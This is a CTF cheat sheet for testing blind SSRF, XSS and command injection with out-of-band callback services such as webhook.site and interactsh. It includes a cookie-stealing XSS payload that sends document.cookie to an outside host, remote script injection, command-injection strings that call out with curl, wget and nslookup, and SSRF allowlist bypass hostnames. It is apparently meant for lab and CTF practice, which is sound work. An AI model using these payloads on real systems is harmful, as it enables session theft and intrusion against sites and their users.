Web Services CTF Cheat Sheet

Purpose

Use this sheet when the target is blind:
- blind SSRF
- blind XSS
- blind RCE / deserialization
- background webhooks
- API calls you want to inspect quickly

This complements your main web + Burp sheets.
It focuses on external helpers, not vuln theory.

Core stack

webhook.site      # quick HTTP callbacks
interactsh-client # DNS / HTTP / SMTP OOB
httpbin.org       # inspect request shape
CyberChef         # decode / transform
crt.sh            # cert transparency
Wayback           # old endpoints / JS

Quick workflow

1. Generate a unique marker
2. Pick webhook.site or interactsh
3. Inject callback URL in parameter / header / HTML
4. Poll logs
5. If hit appears:
   - confirm source
   - inspect method / headers / body
   - escalate payload
6. Save payload and marker in notes

webhook.site

Use for
- fast HTTP callbacks
- full request body / headers
- manual testing and replay

Examples
https://webhook.site/<id>
https://webhook.site/<id>?tag=ssrf1
https://webhook.site/<id>/x.js

interactsh

Use for
- DNS proof
- HTTP proof
- SMTP callbacks
- CLI / automation

Run
interactsh-client
interactsh-client -json
interactsh-client -o interactions.json

Typical payload
http://<id>.oast.site

Blind XSS listeners

XSS Hunter style payload
<script src=https://<id>.xss.ht></script>

Simple proof-only payloads
<img src=https://webhook.site/<id>/x>
<svg onload=fetch('https://webhook.site/<id>?c='+document.cookie)>

httpbin

Useful endpoints
https://httpbin.org/anything
https://httpbin.org/headers
https://httpbin.org/get
https://httpbin.org/post
https://httpbin.org/status/403
https://httpbin.org/redirect-to?url=https://example.com

curl checks

curl -s https://httpbin.org/anything   -H "X-Test: abc123"   -d '{"a":1}'

curl -s https://httpbin.org/headers   -H "Authorization: Bearer test"

CyberChef

Good for
- URL decode repeatedly
- Base64 / gzip / JWT
- hex ↔ raw
- XOR
- JSON beautify

Typical chain
URL Decode → From Base64 → Gunzip → Parse JSON

REST triage

Look for
- /openapi.json
- /swagger / /docs / /redoc
- content-type strictness
- method allowlist
- auth in cookie / header / both
- CORS

Probe
curl -i -X OPTIONS https://target/api/users

GraphQL probes

curl -s https://target/graphql   -H "Content-Type: application/json"   -d '{"query":"query{__typename}"}'

curl -s https://target/graphql   -H "Content-Type: application/json"   -d '{"query":"{__schema{types{name}}}"}' | jq

API bug classes

- IDOR
- mass assignment
- authZ mismatch
- hidden methods
- weak CORS
- GraphQL introspection on prod
- debug docs exposed

Wildcard DNS

nip.io
127.0.0.1.nip.io

sslip.io
127.0.0.1.sslip.io

Use for
- SSRF allowlist tricks
- host validation tests
- callback hostnames when raw IP is blocked

Host / origin probes

X-Forwarded-Host: <id>.oast.site
Host: 127.0.0.1.nip.io
Origin: https://evil.example
Referer: https://webhook.site/<id>

crt.sh

Find:
- api.
- dev.
- old.
- admin.
- staging.
- internal-looking names

Wayback

Check:
- old JS bundles
- deprecated endpoints
- old login / admin paths
- robots.txt history
- docs accidentally published then removed

Pick the right helper fast

Need full HTTP request details now?
  → webhook.site

Need DNS / SMTP OOB or CLI automation?
  → interactsh

Need blind XSS victim metadata?
  → XSS Hunter style service

Need to inspect what your script sends?
  → httpbin

Need SSRF allowlist / host validation tricks?
  → nip.io / sslip.io

Need forgotten endpoints or subdomains?
  → Wayback / crt.sh

Rule Start with webhook.site for human-readable HTTP debugging; switch to interactsh when you suspect the server only makes DNS or background OOB requests.

Marker helper

ID=YOUR_UUID
TAG=$(date +%s)-ssrf
URL="https://webhook.site/$ID?tag=$TAG"
echo $URL

GraphQL template

curl -s https://target/graphql   -H "Content-Type: application/json"   -d '{"query":"query{__typename}"}' | jq

Poller ideas

curl -s "https://webhook.site/token/$TOKEN_ID/requests?sorting=newest" | jq
interactsh-client -json
interactsh-client -o hits.json

Blind SSRF

http://<id>.oast.site
https://webhook.site/<id>?src=ssrf1
http://127.0.0.1.nip.io

Blind XSS

<img src=https://webhook.site/<id>/x>
<script src=https://<id>.xss.ht></script>

Blind command proof

; curl https://webhook.site/<id>
&& wget https://webhook.site/<id>
| nslookup <id>.oast.site